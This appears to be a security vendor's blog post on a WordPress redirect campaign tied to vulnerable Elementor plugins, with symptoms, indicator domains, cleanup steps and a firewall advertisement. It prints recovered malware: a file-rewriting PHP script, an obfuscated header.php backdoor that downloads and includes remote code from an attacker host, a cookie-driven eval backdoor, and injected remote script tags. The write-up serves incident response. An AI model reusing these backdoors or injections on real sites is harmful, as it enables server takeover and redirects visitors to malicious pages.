Attacks targeting vulnerabilities in WordPress themes and plugins have only aggravated in the past few months. The already ongoing attack campaign on WordPress plugins – Elementor Pro, The Ultimate Addons of Elementor & Astra Theme seem to have taken a new turn with redirection hack campaigns surfacing redirecting users to questionable websites like
- digestcolect [.] com,
- js[.]donatelloflowfirstly.ga,
- track[.]developfirstline[.]com/t.js?s=5,
- deliverynotforme[.]best,
- 0.beerockstars[.]ga/?p=me3gmnbugm5gi3bpgq3tknq&sub2=mtrolley83,
- 0.directedmyfounds[.]ga/?p=gi3tazrwga5gi3bpgizdgmq&sub2=mstimens3,
- well.linetoadsactive[.]com/m.js?n=nb5,
- 0.realhelpcompany[.]ga,
- fast.helpmart[.]ga/m[.]js?w=085,
- dock.lovegreenpencils[.]ga/m.js?n=nb5,
- cht.secondaryinformtrand[.]com/m.js?n=nb5,
- main.travelfornamewalking[.]ga/,
- irc.lovegreenpencils[.]ga/, etc.
Both Elementor and Ultimate Addons for Elementor have issued updates to patch these security issues, so please update to the following versions if not done already:
- Elementor Pro: 2.9.4
- Ultimate Addons for Elementor: 1.24.2
Related hack – We have also seen WordPress websites redirecting to track. developfirstline[.com]/t.js?s=5′ type=’text/javascript
What We Know So Far…
One common symptom shown by the affected websites is – Redirection.
That said, there are other symptoms as well that hint at the attack:
- Gibberish files added in the website root directory
- Unauthenticated admin users added to the WordPress admin area
- Unknown files and folders in /wp-content/uploads/elementor/custom-icons/
- Unknown files in website root such as
wp-xmlrpc.phpwp-cl-plugin.php
- Thousands of unknown malicious javascript & PHP files added to the file system
What Does Malicious ‘tap.digestcolect.com/r.php?id=0 spam/’ Website Redirection Code Look Like?
- The following code was found under a file named ‘hjghjerg‘:
<?php $lastRunLog = "./debugs.log";
if (file_exists($lastRunLog)) {
$lastRun = file_get_contents($lastRunLog);
if (time() - $lastRun >= 6400) {
search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
file_put_contents($lastRunLog, time());
}
} else {
search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index");
search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
file_put_contents( './debugs.log', time());
}
function search_file($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
@search_file( $dir,"index");
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
@search_file( $dir,"index");
return;
}
}
...
function search_file_js($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
@search_file_js( $dir,".js");
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
@search_file_js( $dir,".js");
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
make_it_js($path);
} }else if($value != "." && $value != "..") {
search_file_js($path, $file_to_search);
}
}
}
function make_it_js($f){
$g = file_get_contents($f);
if (strpos($g, 'var') !== false) {
$g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
} else {
$l2 = "";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'mndfhghjf') !== false) {
}
}
}
}
function make_it($f){
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
} else {
$l2 = "";
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'trackstatisticsss') !== false) {
}
}
}
- This piece of code was found inside the file header.php:
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode";
$d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115);
$b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116)));
$c1 = chr(104);
@file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1); ?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).
..
chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } ?><?php if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];} function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}$_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));if(!empty($_1)){$_1=str_rot13(@pack(_1896550334(4),strrev($_1)));if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}}else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}die();} ?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>
- This code was found in some core theme files:
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
How to Fix the Digestcolect [.] com Redirect?
If your website is redirecting or showing other symptoms of the hack, you can quicken your incident response by doing the following:
- Start by checking favorite files that attract hackers like functions.php, wp-config.php & index.php
- Compare the core WordPress files with the one on your server to check if hackers might have infected core files
- Scan your website with an online malware scanner.
- Check the database for unfamiliar admins and users
- Check your root directory for gibberish files
You can follow our WordPress redirection removal guide for more thorough malware removal or follow this step-by-step tutorial for the same.
If the redirection still persists, it is quite possible that hackers have also injected backdoors on your website. This usually requires an in-depth malware scan with code review to clean the website.
Also check out: Step-by-Step WordPress Malware Removal Guide
Not infected? Secure Your Website
Lucky that you dodged the exploit. But don’t play on chances. It’s better to secure your website now. A premium firewall like Astra Security goes a long way in securing your website with the 24×7 monitoring and protection from attacks like JS injection, SQLi, CSRF, XSS, Bad bots, RFI, LFI, and a hundred others.
With a multitude of additional security tools such as Malware Scanner, Country Blocking, IP blocking, Astra security a cakewalk for businesses and blogs alike.